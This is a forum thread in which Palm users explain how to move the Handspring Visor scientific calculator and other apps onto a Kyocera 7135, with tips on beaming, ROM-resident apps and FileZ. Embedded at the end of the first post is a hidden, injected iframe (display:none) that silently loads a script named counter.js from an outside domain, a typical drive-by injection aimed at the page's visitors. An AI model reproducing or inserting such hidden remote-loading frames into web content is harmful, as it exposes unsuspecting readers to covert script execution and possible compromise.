+ Reply to Thread

Installing Handspring's Calc

I'm migrating from a Handspring Visor to my new 7135. The inital Hot-Sync transferred most of my apps and settings. I used LauncherX to beam what the Sync didn't pick up.

BUT

The calculator from the Visor is far superior to the 7135's calculator (Handspring's is scientific, and does metric conversions. The 7135's just does basic arithmetic).

In the "About" window for the 7135, it has a Palm logo and copyright, and it is v4.0. In the Visor, there is a Handspring logo and copyright; it is v3.5H.

If I try to beam over "Calculator," the 7135 asks me if I want to over-write the file. Of course, I don't want to screw anything up, and I am scared to do this.

Has anyone else tried overwriting the default calculator from a Handspring device?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Giddyup, Giddyup, Giddyup 7135 TheBeachBoy's Avatar

Well,

First off, the Kyo calc is in ROM; you can't overwrite it.

Second, do a backup before adding it if you want the extra assurance. I don't *think* adding it will do any harm, but hey, with technology, there is never a 100%.

Third, once you do get it installed (assuming you get it working), you can change the phone application button on the graffiti area to open calc (the icon that took over the calc's former position on your Visor). Since you can open the phone app by hitting the talk button, you might as well use the soft button for calc. Don't know if you already knew that, but I figured it wouldn't hurt to let you know.

Good luck!
    TheBeachBoy

--The World's Greatest Drummer--
    Drummer for the Fondells

Administrator
    also by simply syncing your old profile to this 'hybrid' phone can and will cause you some problems down the road. you maybe installing legacy apps to the 7135 that wont work on it, causing you soft resets and BSOD's. its always best to do a manual install of apps to the 7135 because of its delicate design of palm and phone in one...

I have installed a number of apps out of my old Visor onto the 7135-- but very cautiously. I've installed DateBook+, CityTime, and one more I think.

For installing: What I have found is that, because these were in ROM on the Visor, they will not restore to the 7135 properly when sync'ing. In order to get them there, I've had to beam them. Also, I have backup buddy installed, so if I've restored from sync after a hard reset, it will try to restore them, but they won't work properly. What I've had to do is go into FileZ, first unmark them read only, then delete them. (If you haven't used FileZ before, be careful in there! Also, some FileZ tips in this scenario: Note that FileZ will give you the option of viewing apps in RAM and ROM, or only the RAM ones, and will tell you whether an app you are looking at is in RAM or ROM. So if you have to do this, and if you are viewing ROM apps as well, and there are two, look for the one that does not have the little chip next to it-- That's the one that came over on the sync, and that's the one that you need to delete. You can't delete the other one, anyway-- as the previous poster said, it's hard-coded in.) Then I can beam them. If I'm clever, I remember to delete them from my backup directory before syncing , and then just beam.

Also, I recommend doing one at a time, and testing to make sure that everything is working properly after the beam. I haven't tried Calc, and even on the ones that I've used successfully, it seems that each person's Palm is slightly different, due to different installed apps or whatever, so what works on mine may not on anyone else's. And Marctronixx's words are wise!

Personally, I'm very happy that DateBook+ works. I've mapped the datebook button to it.

Please ask if any of this is unclear.

turboCat, thanks for the tip about FileZ, great utility app.
    I've managed to successfully transfer the Handspring Calc (don't forget to also transfer the AdvancedCalc app) and CityTime, but DateBook+ causes and error when I run it on the 7135. As the error message is "HS?!", I suspect that app checks you are running it on Handspring hardware.
    Does anyone know how to make it work on the 7135?

Mathieuf:
    Glad to hear you got the other stuff over.

Which version of DateBook+ are you running? (NOTE: For anyone who has gotten it running on the Kyo, don't check your version there. Check it on the Handspring: About causes a soft reset on my Kyo.) I am running v. 3.0H. Perhaps yours is a newer version. (My Visor is a Deluxe, advance purchased before they were released , so I wouldn't be surprised if I have an older version of DB+.)

I use EasyCalc. It's scientific, does graphing, and it's free! It also needs MathLib.prc installed.